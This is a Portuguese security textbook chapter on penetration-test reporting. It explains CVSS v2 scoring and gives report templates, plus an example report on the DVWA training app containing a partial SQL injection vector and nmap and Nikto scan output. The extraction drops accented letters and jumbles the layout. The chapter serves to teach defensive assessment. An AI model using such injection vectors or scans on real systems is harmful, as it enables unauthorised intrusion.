1 OAKS, Scott. Java TM Security. 2nd edition. OReilly, 2001.
Hash Function Design Strategy Called SMASH. Em Selected Areas in Cryptography, 12th
International Workshop, SAC 2005, volume 3897 de Lecture Notes in Computer Science,
pginas 234244. Springer, 2005.
1 RIBEIRO, Ronaldo. Cdigo Postal | guas Claras, DF 71900-000 Fico Urbana. Em National
Geographic Brasil, janeiro de 2011.
1 SAVALICH, William. Evolution in the Revolution. Em Digital Photo Pro, maro/abril de 2009.
1 PRAMSTALLER, Norbert, RECHBERGER, Christian e RIJMEN, Vincent. Breaking a New
467
1 SINGH, Simon. The Code Book The Evolution of Secrecy from Mary, Queen of Scots to
Quantum Cryptography. Doubleday, 1999.
1 SMART, Nigel. ECRYPT II Yearly Report on Algorithm and Keysizes (2009-2010) Revision 1.0.
ECRYPT, maro de 2010.
1 STALLINGS, William. Cryptography and Network Security Principles and Practice. 4th
edition. Prentice Hall.
1 STEVENS, Marc, SOTIROV, Alexander, APPELBAUM, Jacob, LENSTRA, Arjen, MOLNAR,

David, OSVIK, Dag Arne e DE WEGER, Benne. Short Chosen-Prefix Collisions for MD5 and
the Creation of a Rogue CA Certificate. Em Advances in Cryptology CRYPTO 2009 29th
Annual International Cryptology Conference, volume 5677 de Lecture Notes in Computer
Science, pginas 5569, Springer, 2009.
1 SWENSON, Christopher. Modern Cryptanalysis Techniques for Advanced Code Breaking.

Wiley Publishing, Inc., 2008.
1 WAGNER, David e SCHNEIER, Bruce. Analysis of the SSL 3.0 Protocol. Em Proceedings of the
Second USENIX Workshop on Electronic Commerce, 1996.
1 WANG, Xiaoyun, YAO, Andrew e YAO, Frances. New Collision Search for SHA-1. Rump Session
de Crypto05, 2005.
1 WANG, Xiaoyun, YIN, Yiqun Lisa e YU, Hongbo. Finding Collisions in the Full SHA-1. Em
CRYPTO 2005: 25th Annual International Cryptology Conference, volume 3621 de Lecture
Notes in Computer Science. Springer, 2005.
1 WANG, Xiaoyun e YU, Hongbo. How to Break MD5 and Other Hash Functions. Em
EUROCRYPT 2005, 24th Annual International Conference on the Theory and Applications
of Cryptographic Techniques, volume 3494 de Lecture Notes in Computer Science, pages
1935. Springer, 2005.
1 WONG, Kate. Twilight of the Neandertals. Em Scientific American, volume 301, nmero 2,
agosto de 2009.
468
10
Ilustrar como os resultados de um teste de invaso de aplicao web podem ser
apresentados para as equipes tcnicas e gerenciais, considerando-se a gravidade de
cada vulnerabilidade encontrada.
Introduo
Uma vez finalizado um teste de invaso em aplicaes web, o resultado deve ser apre-
conceitos
Relatrio detalhado, relatrio executivo, common vulnerability scoring system.
sentado ao cliente do servio, seja ele interno ou externo. Essa etapa extremamente
importante, pois ela que nortear quais problemas sero tratados, considerando-se o
risco para o negcio, as limitaes de oramento, os prazos e a dificuldade de correo.
Obviamente, em um cenrio ideal, todas as vulnerabilidades devem ser corrigidas, mas,
na prtica, infelizmente, isso quase nunca acontece. Desse modo, subsdios suficientes
devem ser fornecidos ao cliente para que ele, com base em uma anlise de risco, seja
capaz de traar um plano de ao realstico, para correo dos defeitos mais crticos.
Esse processo, normalmente, resulta nos seguintes entregveis e atividades:
1 Relatrio detalhado: contm todas as informaes, gerais e tcnicas, acerca do

trabalho realizado, incluindo as vulnerabilidades encontradas, meios de explorao,
recomendaes para correo e o quo crtico cada problema para a segurana do
ambiente. Devido ao nvel de detalhes fornecido por tal documento, serve de base
para o processo de correo ou para a criao de controles compensatrios.
1 Relatrio executivo: baseado no contedo do relatrio detalhado, engloba apenas

os fatos mais relevantes do teste de invaso executado. O objetivo que seja lido por
membros do corpo gerencial, para que tenham uma viso geral das vulnerabilidades
do ambiente.
1 Apresentao tcnica: deve ser realizada para o grupo tcnico do cliente, visando
mostrar as vulnerabilidades encontradas e discutir mtodos que podem ser adotados para corrigi-las de maneira apropriada. Normalmente, esse tipo de reunio
tem durao de duas a quatro horas, dependendo da quantidade de problemas
Captulo 10 - Escrita de relatrios e exerccio completo
objetivos
Escrita de relatrios
e exerccio completo
detectados pelo teste de invaso.
469
1 Apresentao executiva: voltada para o corpo gerencial, trata somente dos fatos mais
importantes do trabalho, sem entrar em detalhes tcnicos. Em uma reunio dessa natureza, que dura no mximo uma hora, comum discutir, por exemplo, aspectos como o
tempo e o investimento necessrios para correo das vulnerabilidades reportadas.
O objetivo deste captulo discutir a criao de relatrios de testes de invaso e fornecer
um exerccio completo de avaliao de segurana de uma aplicao web. Para esse fim, o
Common Vulnerability Scoring System (CVSS) e modelos de relatrio completo e executivo
sero apresentados.A parte prtica, depois de um exerccio de aquecimento, contemplar
um cenrio abrangente, cobrindo diversas vulnerabilidades diferentes.
Common Vulnerability Scoring System

O Common Vulnerability Scoring System (CVSS), mantido pelo Forum for Incident
Response and Security Teams First, define mtodos para estimar a gravidade de
First
vulnerabilidades de TI com base em trs escores diferentes, de modo que seja possvel
Confederao
internacional de times
de resposta a incidentes
de segurana, que atua
de maneira reativa
e preventiva contra
incidentes, por meio do
compartilhamento de
informaes, criao
de ferramentas e
metodologias, definio
de melhores prticas e
estmulo criao de
novas equipes ao redor
do mundo.
avali-las sob um critrio uniforme (Mell et al., 2007). Cada escore, que um nmero real
entre zero e dez, resume um grupo de mtricas relacionadas entre si:
1 Base: compreende todas as mtricas sobre aspectos intrnsecos da vulnerabilidade,

os quais independem de tempo e do ambiente no qual ela ocorre.
1 Temporal: engloba as caractersticas da vulnerabilidade que variam com o tempo,

mas no com o ambiente.
1 Ambiental: considera as caractersticas de um ambiente especfico.

importante observar que, enquanto o grupo base apresenta as propriedades fundamentais da vulnerabilidade, os demais adicionam informaes referentes ao contexto particular, no qual o defeito encontrado, enriquecendo assim o resultado (Mell et al., 2007).
Em inmeras situaes, porm, somente o escore base utilizado e essa a abordagem
adotada pelo presente texto. De modo a justificar o valor numrico calculado para cada
grupo, o padro demanda que um vetor textual, contendo as escolhas de cada mtrica,
acompanhe o respectivo escore.
Base
O grupo base de mtricas considera as caractersticas fundamentais de uma vulnerabilidade, listadas a seguir:
1 Vetor de acesso: considera o posicionamento necessrio de um atacante na rede,

para que a explorao seja bem sucedida.
1 Complexidade de acesso: mede a dificuldade de explorao da vulnerabilidade.
470
1 Autenticao: descreve se necessrio estar autenticado ou no, para conseguir

explorar a vulnerabilidade.
1 Impacto confidencialidade: quantifica o impacto que o abuso do defeito de segurana causa confidencialidade das informaes.
1 Impacto integridade: quantifica o impacto que o abuso do defeito de segurana

causa integridade das informaes.
1 Impacto disponibilidade: quantifica o impacto que o abuso do defeito de segurana

causa disponibilidade das informaes.
Os critrios de classificao estabelecidos para cada uma das mtricas, a frmula para
clculo do escore final e a estrutura do vetor textual so apresentados, nas prximas subsees, de acordo com o artigo de Mell et al. (2007).
Vetor de acesso (AV)

Quanto maior o nmero de pessoas com acesso ao ambiente vulnervel, maior a criti-
cidade do defeito de segurana, pois o potencial de atacantes cresce.

Por exemplo, caso um servidor web inseguro seja colocado na internet e outro idntico,
em uma rede local, sem conexo remota, o ltimo estar exposto somente aos usurios do
prprio ambiente, enquanto que o primeiro ter o mundo todo como eventual origem de
ataque. Ainda nessa linha de raciocnio, o fato de uma explorao poder ser realizada remotamente estimula que mais pessoas tentem o ataque, pois as chances de permanecerem
annimas aumentam drasticamente. A Figura 10.1 ilustra os valores e os critrios dessa
mtrica.
Figura 10.1
Avaliao da
mtrica Vetor
de Acesso.
Valor da
mtrica
f(AV)
Critrios
Local (L)
0,395
A vulnerabilidade pode ser explorada somente com acesso

local ao ativo vulnervel.
Rede adjacente
(A)
0,646
possvel explorar a vulnerabilidade apenas a partir da rede

local na qual se encontra o ativo inseguro.
Rede (N)
1,0
O defeito de segurana pode ser explorado remotamente.

No caso de aplicaes web, normalmente, esse o cenrio
encontrado.
Complexidade de acesso (AC)

Avalia o nvel de dificuldade de execuo do ataque, com base nos privilgios que o
usurio precisa ter no sistema alvo, na dependncia de tcnicas de engenharia social

e se a configurao vulnervel encontrada comumente em ambientes de produo,
entre outros fatores.
Figura 10.2
Avaliao
da mtrica
Complexidade
de Acesso
Valor da
mtrica
f(AC)
Critrios
Alto (H)
0,35
Existem condies especiais para que o ataque seja bemsucedido, como nvel de acesso elevado ao ambiente e
necessidade de comprometimento de outros ativos, por exemplo.
Mdio (M)
0,61
Algumas condies no to restritivas existem para efetuar a

explorao da vulnerabilidade com sucesso. Exemplos incluem a
necessidade de levantamento de informaes sobre o ambiente
e agentes de ameaa limitados a um pequeno grupo de pessoas.
Baixo (L)
0,71
No h condies especializadas para explorao da

vulnerabilidade. Um exemplo consiste na existncia de
ferramentas automatizadas para execuo de um ataque.
Os critrios e valores da mtrica AC esto apresentados na Figura 10.2.
471
Autenticao (Au)
Considera quantas vezes um atacante necessita se autenticar no sistema alvo antes
de executar um ataque explorando a vulnerabilidade. importante observar que a

segurana do mecanismo de autenticao no considerada por essa mtrica, que trata
apenas do fornecimento de credenciais.
Os valores possveis e critrios dessa mtrica esto ilustrados na Figura 10.3.
Valor da mtrica
f(Au)
Critrios
Mltiplas vezes (M)
0,45
Para conseguir explorar a vulnerabilidade, o atacante

necessita se autenticar duas ou mais vezes no ambiente.
Uma vez (S)
0,56
O usurio malicioso precisa se autenticar uma vez no

ambiente antes de realizar o ataque.
Nenhuma vez (N)
0,704
No h necessidade de autenticao para a realizao de

um ataque.
Impacto confidencialidade (C)

Considera o montante de informaes que pode ter o sigilo comprometido se a vulnera-
Figura 10.3
Avaliao
da mtrica
Autenticao.
bilidade explorada com sucesso.

A Figura 10.4 apresenta os valores e critrios dessa mtrica.
Valor da mtrica
f(C)
Critrios
Nenhum (N)
0,0
Nenhuma informao sigilosa revelada, como resultado de

uma explorao bem-sucedida da vulnerabilidade.
Parcial (P)
0,275
Parte das informaes sigilosas comprometida se um

ataque realizado com sucesso.
Completo (C)
0,660
Todas as informaes sigilosas so reveladas em

decorrncia de um ataque bem-sucedido.
Impacto integridade (I)

Essa mtrica considera o montante de informaes que tem a integridade comprome-
Figura 10.4
Avaliao da
mtrica Impacto
confidencialidade.
tida caso um ataque consiga explorar a vulnerabilidade.
Os valores e critrios desse item esto ilustrados na Figura 10.5.

Valor da mtrica
f(I)
Critrios
Nenhum (N)
0,0
Nenhuma informao tem a integridade comprometida,

como resultado de uma explorao bem sucedida da
vulnerabilidade.
Parcial (P)
0,275
Parte das informaes tem a integridade comprometida se

um ataque realizado com sucesso.
Completo (C)
0,660
Todas as informaes so adulteradas em decorrncia de

um ataque bem-sucedido.
Impacto disponibilidade (A)

Mede o impacto disponibilidade do sistema caso a vulnerabilidade seja explorada em
um ataque bem-sucedido.
472
Figura 10.5
Avaliao da
mtrica Impacto
integridade.
A Figura 10.6 apresenta os valores e critrios dessa mtrica.

f(A)
Critrios
Nenhum (N)
0,0
No h impacto disponibilidade do sistema vulnervel.
Parcial (P)
0,275
Se a vulnerabilidade explorada com sucesso, h reduo do

desempenho do ativo ou interrupo de parte dos servios.
Completo (C)
0,660
O sistema fica totalmente indisponvel em decorrncia de um

ataque bem-sucedido.
Clculo de escore de base e estrutura do vetor textual

Para calcular o escore de base da vulnerabilidade, as seguintes frmulas devem ser empregadas:
Impacto=10,41(1-(1-f (C))(1-f (I))(1-f (A)))
f (Impacto)=
{(0; se Impacto=0
1,176; caso contrrio)
Explorabilidade=20f (AV )f (AC)f(Au)

Escore de Base=arredonda_1_casa_decimal((0,6Impacto+0,4Explorabilidade-1,5)f (Impacto))
O vetor textual, por sua vez, indica qual valor foi escolhido para cada mtrica, de acordo
com os critrios estabelecidos, e representado como uma lista, cujos elementos so

separados uns dos outros pelo caractere / e definidos pelo nome abreviado da mtrica,
seguido de : e, por fim, do valor atribudo.
O formato geral est abaixo apresentado:
AV:<L|A|N>/AC:<H|M|L>/Au:<M|S|N>/C:<N|P|C>/I:<N|P|C>/A:<N|P|C>
Para exemplificar esses conceitos, considere-se uma vulnerabilidade de injeo de SQL e os
valores atribudos a cada uma das mtricas por Gordeychik et al. (2008):
1 Vetor de acesso: Rede (N), f(AV) = 1,0.

1 Complexidade de acesso: Baixo (L), f(AC) = 0,71.
1 Autenticao: Nenhuma vez (N), f(Au) = 0,704.
1 Impacto confidencialidade: Completo (C), f(C) = 0,660.
1 Impacto integridade: Completo (C), f(I) = 0,660.
1 Impacto disponibilidade: Completo (C), f(A) = 0,660.
Aplicando-se as frmulas aos valores acima, obtm-se:
1 Impacto=10,41(1-(1-0,66)(1-0,66)(1-0,66))=10,41(1-0,340,340,34)=10,41(1-0,039304)=
10,410,960696=10,00084536
1 f(Impacto)=1,176
1 Explorabilidade=2010,710,704=9,9968
1 Escore de Base=(0,610,00084536+0,49,9968-1,5)1,176= (6,000507216+3,99872-1,5)1,176 =
8,4992272161,176=9,995091206016
=10,0
Figura 10.6
Avaliao da
mtrica Impacto
disponibilidade (A).
Valor da
mtrica
473
O vetor textual resultante para este cenrio :
AV:N/AC:L/Au:N/C:C/I:C/A:C
Logo, o escore de base para injeo de SQL deve ser indicado da seguinte maneira:
10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
De modo a facilitar a incluso em relatrios, no apndice deste captulo, uma tabela, adaptada do trabalho de Gordeychik et al. (2008), enumera os escores de base para os principais
defeitos de segurana existentes em aplicaes web.
Perigo de vulnerabilidades
Como possvel comparar o perigo oferecido por vulnerabilidades diferentes?
Tipos de relatrios
Normalmente, ao final de um teste de invaso, so fornecidos dois relatrios, descre-
vendo os resultados do trabalho realizado:
1 Relatrio detalhado: contm todas as informaes, gerais e tcnicas, acerca do

trabalho realizado, incluindo as vulnerabilidades encontradas, meios de explorao,
recomendaes para correo e a criticidade de cada problema. Devido ao nvel de
detalhes fornecido por tal documento, serve de base para o processo de correo ou
para a criao de controles compensatrios.
1 Relatrio executivo: baseado no contedo do relatrio detalhado, engloba apenas

os fatos mais relevantes do teste de invaso executado. O objetivo que seja lido por
membros do corpo gerencial, para que tenham uma viso geral das vulnerabilidades
do ambiente.
Nesta seo, para cada um dos tipos de relatrio, um modelo geral apresentado, enquanto
que, no apndice deste captulo, exemplos so fornecidos para que o leitor tenha um norte
de como documentar os resultados obtidos.
Relatrio detalhado
Um modelo de relatrio detalhado est ilustrado abaixo:
1. Resumo
474
Descreve o trabalho realizado, incluindo o escopo de teste, perodo de execuo e principais

resultados alcanados.
2. Informaes do cliente
Lista as informaes de contato do cliente, como nome, endereo comercial, telefone, e-mail
e logotipo da empresa.
3. Escopo do trabalho
Descreve as aplicaes testadas no trabalho.
3.1.Aplicao 1
Descrio
Fornece uma descrio de alto nvel da aplicao, indicando o propsito, tecnologias
empregadas e funcionalidades existentes.
URL da pgina inicial
Topologia de rede
...
3.m
Aplicao m
Descrio
Topologia de rede
4. Descrio do teste
Apresenta todos os aspectos do teste de invaso realizado.

4.1.Tipo de teste
Indica se o teste foi caixa-branca, caixa-cinza ou caixa-preta.

4.2.Perodo de execuo
Datas de incio e de finalizao do trabalho.

4.3.Locais de execuo
Local fsico e local lgico, a partir dos quais os testes foram realizados.
4.4.Metodologia empregada
Descrio da metodologia de teste empregada.

4.5.Informaes disponibilizadas
Lista de informaes disponibilizadas pelo cliente, para execuo dos trabalhos, incluindo
modelo de dados, entre outros.
4.6.Configurao dos controles de permetro
Quaisquer excees que tenham sido configuradas nas regras de permetro devem estar
listadas nesta seo.
4.7.Testes excludos
Enumerao dos testes que no foram executados.

5. Resultados
Descrio das vulnerabilidades encontradas em cada aplicao do escopo, incluindo uma

explicao do problema, URL afetada, tcnica de explorao que pode ser empregada, recomendaes e escore de base segundo o CVSS.
diagramas de rede, contas de usurio, projeto do sistema, documentos de requisito,
475
5.1.Aplicao 1
Anlise das vulnerabilidades encontradas na Aplicao 1.

5.1.1 Vulnerabilidade 1
Descrio do problema
URL da pgina afetada
Mtodo de explorao
Recomendaes
Escore de base (CVSS)
...
5.1.n1 Vulnerabilidade n1
Descrio do problema
Mtodo de explorao
Recomendaes
...
5.m Aplicao m
5.m.1 Vulnerabilidade 1
Descrio do problema
Mtodo de explorao
Recomendaes
...
5.m.nm Vulnerabilidade nm
Descrio do problema
476

Mtodo de explorao
Recomendaes
6. Referncias
Lista de referncias bibliogrficas.
7. Anexos
Sadas de ferramentas, informaes extradas por meio de ataques, documentos de terceiros detalhando correes etc.
Relatrio executivo
Um modelo de relatrio executivo est ilustrado a seguir:
1. Resumo
Descreve o trabalho realizado, incluindo o escopo de teste, perodo de execuo e principais

resultados alcanados.
Lista as informaes de contato do cliente, como nome, endereo comercial, telefone, e-mail
e logotipo da empresa.
Descreve as aplicaes testadas no trabalho.

3.1.Aplicao 1
Fornece uma descrio de alto nvel da aplicao, indicando o propsito e funcionalidades existentes.
...
3.m
Aplicao m
...
4. Sntese dos resultados
Nesta seo, os resultados dos testes de invaso devem ser apresentados graficamente,
agrupando as vulnerabilidades pelo tipo e, tambm, pelo grau de criticidade.
5. Diagnstico geral
Esta seo deve descrever, resumidamente, o que possvel realizar contra a aplicao, com
Resultado de teste de invaso
Como o resultado de um teste de invaso pode ser apresentado?
Apndice
Tabela de escore de base de acordo com o CVSS
A Figura 10.7, adaptada de Gordeychik et al. (2008), ilustra possveis escores de base para as
principais vulnerabilidades encontradas em aplicaes web, alm de relacionar os captulos
em que aquelas podem ser encontradas neste livro.
base nas vulnerabilidades encontradas.
477
478
Vulnerabilidade
Escore de Base
Captulos
Abuso de funcionalidade
4 (AV:N/AC:H/Au:N/C:P/I:P/A:N)
Aplicao mal configurada
5,1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Ataque por fora bruta
6,8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
3, 4
Autenticao insuficiente
Autorizao insuficiente
5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
6,4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Expirao de sesso insuficiente
Falsificao de contedo
Fixao de sesso
HTTP Request Smuggling
HTTP Request Splitting
HTTP Response Smuggling
HTTP Response Splitting
Incluso remota de arquivo
Indexao insegura
5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Injeo de comandos de sistema

operacional
Injeo de comandos SMTP
Injeo de SQL
Injeo de SSI
Injeo de XML
7,5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Injeo de XPath
Injeo de XQuery
Injeo em filtros LDAP
Negao de servio
7,8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
Percurso de caminho
7,8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
Percurso de diretrio
Permisses inadequadas
Previsibilidade de credenciais
Previsibilidade de identificadores
de sesso
Previsibilidade de localizao de
recursos
4
8
Figura 10.7
Escores de base
para as principais
vulnerabilidades de
aplicaes web.
Vulnerabilidade
Escore de Base
Captulos
Processo de validao insuficiente
Proteo de dados insuficiente
Reconhecimento
0 (AV:N/AC:L/Au:N/C:N/I:N/A:N)
Redirecionamento
2,6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Servidor mal configurado
5,1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Transporte de dados inseguro
Vazamento de informaes
2, 6
Exemplo de relatrio detalhado

1. Resumo
Este relatrio descreve os resultados do teste externo de invaso da aplicao DVWA, realizado no perodo de 05/01/2011 a 14/01/2011. Diversas vulnerabilidades foram descobertas
ao longo do processo, sendo algumas delas extremamente crticas, por possibilitarem a
extrao completa da base de dados, que se encontra em claro, apesar de conter informaes sigilosas.
Nome do
responsvel:
Fulano de Tal
e-mail:
fulano.tal@esr.rnp.br
Endereo:
Fone:
(21) 2275-5578
Rua Lauro Mller, 455, 4 andar Botafogo

CEP: 22290-160 Rio de Janeiro, RJ
Faz parte do escopo do presente trabalho uma nica aplicao web, chamada de DVWA.
3.1.DVWA
Descrio
A aplicao DVWA, criada pela RandomStorm, tem por objetivo permitir que aquelas
pessoas interessadas em aprender sobre vulnerabilidades em aplicaes web possam
realizar testes, em um ambiente controlado, sem cometer infraes legais. Como um
sistema de cdigo aberto, pode-se analisar o cdigo vulnervel, para entender o motivo
de um dado problema ocorrer.
http://dvwa.esr.rnp.br/login.php
479
Topologia de rede
Rede interna
Internet
DMZ
DVWA
4. Descrio do teste
4.1.Tipo de teste
Foi executado teste do tipo caixa-cinza.

4.2.Perodo de execuo
Este trabalho foi realizado no perodo de 05/01/2011 a 14/01/2011, somente em dias teis
e em horrio comercial.
4.3.Locais de execuo
O teste de invaso foi efetuado, a partir da sede da empresa Pentest Inc., em Campinas
(SP), por meio da internet.
4.4.Metodologia empregada
A metodologia de teste empregada consiste em um processo cclico, envolvendo as

seguintes etapas:
2 Reconhecimento: compreende o levantamento de informaes que podem auxiliar

no teste de invaso.
2 Mapeamento: consiste em relacionar tudo o que foi levantado na fase de reconhecimento, resultando em um mapa da aplicao.
2 Identificao de vulnerabilidades: busca de vulnerabilidades, nas diversas pginas

acessveis da aplicao e, tambm, na infraestrutura subjacente.
2 Explorao de vulnerabilidades: explorao das vulnerabilidades encontradas, para

se obter maior nvel de acesso e reiniciar o ciclo.

4.5.Informaes disponibilizadas
A ESR disponibilizou as seguintes informaes para realizao dos testes:
2 Diagrama de rede.
2 Conta de acesso no privilegiada (esruser/esruser).
2 URL da pgina principal da aplicao.
4.6.Configurao dos controles de permetro
Nenhuma configurao especial foi realizada no firewall da ESR para a execuo do teste de
invaso da aplicao DVWA.
480
4.7.Testes excludos
No foram realizados os seguintes testes:
2 Negao de servio.
2 Identificao de vulnerabilidades nos elementos de rede.
2 Anlise do cdigo-fonte da aplicao.
5. Resultados
Esta seo apresenta as vulnerabilidades encontradas no teste de invaso da aplicao

DVWA, incluindo, para cada uma delas, descrio do problema, URL afetada, mtodo de
explorao, recomendaes para correo e escore de base (CVSS).
5.1.DVWA
5.1.1. Injeo de SQL

Descrio do problema
Injeo de SQL atualmente um dos ataques mais comuns contra aplicaes web e consiste
em inserir comandos SQL, em campos e parmetros da aplicao, com o objetivo que sejam
executados na camada de dados (Stuttard e Pinto, 2007; Howard et al., 2005). Em ataques
mais simples, operaes podem ser realizadas no banco de dados, limitadas aos privilgios
da conta que realiza o acesso. Com um pouco mais de elaborao, possvel aproveitar-se
dos mecanismos de interao com o sistema operacional, existentes em bancos de dados,
para leitura/escrita de arquivos e execuo de comandos arbitrrios, por exemplo.
http://dvwa.esr.rnp.br/vulnerabilities/sqli/
Mtodo de explorao
Para extrao de dados arbitrrios, possvel fornecer o seguinte vetor ao campo User Id:
union <SELECT com duas colunas>#

Recomendaes
process-la, verifique se ela est de acordo com valores reconhecidamente vlidos
para o campo ou parmetro.
2 No submeta consultas ao banco de dados que sejam resultantes da concatenao do

comando a ser executado com valores fornecidos por usurios.
2 Utilize apenas comandos preparados (prepared statements), os quais so pr-compilados e no permitem que a semntica seja alterada depois disso.
2 Realize o acesso camada de dados por meio de procedimentos definidos no banco

de dados, encapsulando, assim, a estrutura das tabelas que compem a aplicao.
2 Capture todos os erros de execuo e fornea apenas mensagens tratadas aos usurios, isto , no exiba erros contendo comandos SQL, pilhas de execuo e cdigos
especficos de plataforma.
2 Utilize na aplicao uma conta para acesso ao banco de dados com os mnimos privil-
Para evitar ataques baseados em injeo de SQL, as seguintes medidas devem ser adotadas:
gios necessrios execuo das tarefas.

481

5.1.2. Cross-site scripting refletido
Descrio do problema
Cross-site scripting, tambm conhecido como XSS, atualmente um dos defeitos de
segurana mais comumente encontrados em aplicaes web, permitindo utilizar uma
aplicao vulnervel, para transportar cdigo malicioso, normalmente escrito em
JavaScript, at o navegador de outro usurio. Uma vez que a poltica de mesma origem
respeitada, o navegador da vtima entende que o cdigo recebido legtimo e, por isso,
informaes sensveis, como o identificador de sesso do usurio, por exemplo, podem
ser acessadas programaticamente. Nesse caso, um usurio malicioso capaz de sequestrar a sesso da pessoa atacada, bastando para isso enviar, em todas as requisies
fraudulentas, o identificador obtido.
http://dvwa.esr.rnp.br/vulnerabilities/xss_r/
Mtodo de explorao
Para uma prova de conceito, digite o seguinte vetor no campo presente na pgina afetada:
Recomendaes
process-la, verifique se ela est de acordo com valores reconhecidamente vlidos
para o campo ou parmetro.
2 Utilize codificao HTML na sada, o que faz com que caracteres potencialmente perigosos sejam tratados como parte do contedo da pgina HTML, em vez de considerados parte da estrutura. Por exemplo, o texto <script> seria inserido na pgina como
<script>, uma vez codificado.
2 Quando filtros de entrada e sada forem utilizados, aplique-os, recursivamente, at

que todos os elementos maliciosos sejam removidos.
2 Nos casos em que identificadores de sesso so transportados por meio de cookies,

defina o atributo HttpOnly, para evitar que sejam acessveis por cdigo executando no
lado cliente da aplicao. Embora isso no resolva o problema de cross-site scripting,
pelo menos evita que a sesso da vtima seja facilmente sequestrada.
2 Desabilite o mtodo TRACE no servidor web, para evitar cross-site tracing.

...
6. Referncias
482
7. Anexos
7.1.Sada do nmap
Starting Nmap 5.00 ( http://nmap.org ) at 2011-09-18 11:16 BRT

Interesting ports on exemplo.esr.rnp.br (192.168.213.200):
Not shown: 993 filtered ports
PORT
STATE SERVICE
VERSION
22/tcp
open
OpenSSH 5.5 (protocol 2.0)
ssh
ssh-hostkey: 1024 c0:df:2d:0b:bd:91:c0:05:80:e5:ec:ef:bf:46:cd:f4
(DSA)
|_ 2048 f0:c9:22:fe:61:ab:61:f1:7a:08:2a:00:f5:df:3a:96 (RSA)
80/tcp
|
open
http
Apache httpd 2.2.17 ((Fedora))
robots.txt: has 1 disallowed entry
|_ /
|
html-title: Damn Vulnerable Web App (DVWA) - Login
|_ Requested resource was http://dvwa.esr.rnp.br/login.php

81/tcp
open
http
lighttpd 1.4.26
|_ html-title: Powered by lighttpd

443/tcp
open
ssl/http Apache httpd 2.2.17 ((Fedora))
|_ sslv2: server still supports SSLv2

|_ html-title: Escola Superior de Redes
3000/tcp open
ppp?
8080/tcp open
http
Apache Tomcat/Coyote JSP engine 1.1
8090/tcp open
http
nginx web server 0.8.53
|_ html-title: Test Page for the Nginx HTTP Server on Fedora

7.2.Sada do Nikto
- Nikto v2.03/2.04
-----------------------------------------------------------------------+ Target IP:
192.168.213.200
+ Target Hostname:
dvwa.esr.rnp.br
+ Target Port:
80
+ Start Time:
2011-09-19 11:18:10
|_ html-title: Apache Tomcat
-------------------------------------------------------------------------
483
+ Server: Apache/2.2.17 (Fedora)

- Root page / redirects to: login.php
- /robots.txt - contains 1 disallow entry which should be
manually viewed. (GET)
+ OSVDB-0: Retrieved X-Powered-By header: PHP/5.3.6
+ OSVDB-0: ETag header found on server, inode: 416193, size: 26,
mtime: 0x481e2fb16a580
+ OSVDB-0: GET /config/ : Configuration information may be
available remotely.
+ OSVDB-0: GET /php.ini : This file should not be available
through the web interface.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or
credential theft. See http://www.cgisecurity.com/whitehat-mirror/
WhitePaper_screen.pdf for details
+ OSVDB-12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A94C7B08C10000 : PHP reveals potentially sensitive information via
certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3268: GET /config/ : Directory indexing is enabled: /
config/
+ OSVDB-3092: GET /phpmyadmin/ : phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized
hosts.
+ OSVDB-3092: GET /phpMyAdmin/ : phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized
hosts.
+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
+ OSVDB-3268: GET /docs/ : Directory indexing is enabled: /docs
+ OSVDB-3092: GET /CHANGELOG.txt : A changelog was found.
+ OSVDB-3233: GET /icons/README : Apache default file found.
+ 3577 items checked: 14 item(s) reported on remote host
484
+ End Time:
2011-09-19 11:18:19 (9 seconds)
------------------------------------------------------------------------+ 1 host(s) tested

Test Options: -host dvwa.esr.rnp.br
-------------------------------------------------------------------------
Exemplo de sumrio executivo

1. Resumo
Este relatrio descreve os resultados do teste externo de invaso da aplicao DVWA, realizado no perodo de 05/01/2011 a 14/01/2011. Diversas vulnerabilidades foram descobertas
ao longo do processo, sendo algumas delas extremamente crticas, por possibilitarem a
extrao completa da base de dados, que se encontra em claro, apesar de conter informaes sigilosas.
Nome do
responsvel:
Fulano de Tal
e-mail:
fulano.tal@esr.rnp.br
Fone:
(21) 2275-5578
Rua Lauro Mller, 455, 4 andar Botafogo
Endereo:
CEP: 22290-160 Rio de Janeiro, RJ
Faz parte do escopo do presente trabalho uma nica aplicao web, chamada de DVWA.
3.1.DVWA
A aplicao DVWA, criada pela RandomStorm, tem por objetivo permitir que aquelas
pessoas interessadas em aprender sobre vulnerabilidades em aplicaes web possam
realizar testes, em um ambiente controlado, sem cometer infraes legais. Como um
sistema de cdigo aberto, pode-se analisar o cdigo vulnervel, para entender o motivo
de um dado problema ocorrer.
4. Sntese dos resultados
Como resultado do trabalho de teste de invaso da aplicao DVWA, descobriu-se um total

resumidas abaixo no grfico ilustrado. importante observar que, quanto maior o escore de
base, mais grave a vulnerabilidade.
Quantidade
12
10
8
6
4
2
2
Escore de Base
10
de 21 vulnerabilidades, cujas criticidades, representadas pelo escore de base (CVSS), esto
485
O seguinte grfico, por sua vez, lista, por classe de vulnerabilidade encontrada, o escore de
base (CVSS) e o nmero total de ocorrncias.
5. Diagnstico geral
A aplicao DVWA possui vulnerabilidades extremamente graves, as quais permitem, entre

outras coisas, comprometer totalmente a confidencialidade, a integridade e a disponibilidade
das informaes que manipula, alm de possibilitar ataques entre usurios. De modo geral,
necessrio que a aplicao seja reestruturada completamente, a comear pela topologia de
rede adotada, que expe o banco de dados diretamente internet. Adicionalmente, convm
instalar um web application firewall, para barrar, pelo menos, os atacantes menos sofisticados.
486
Atividade 1 Teste da aplicao Vicnum
Esta atividade tem por objetivo servir de aquecimento para o exerccio de captura da bandeira, por meio da explorao de uma aplicao mais simples. Para inici-la, carregue as
mquinas virtuais do aluno e do servidor (Fedora) e execute os roteiros na primeira delas.
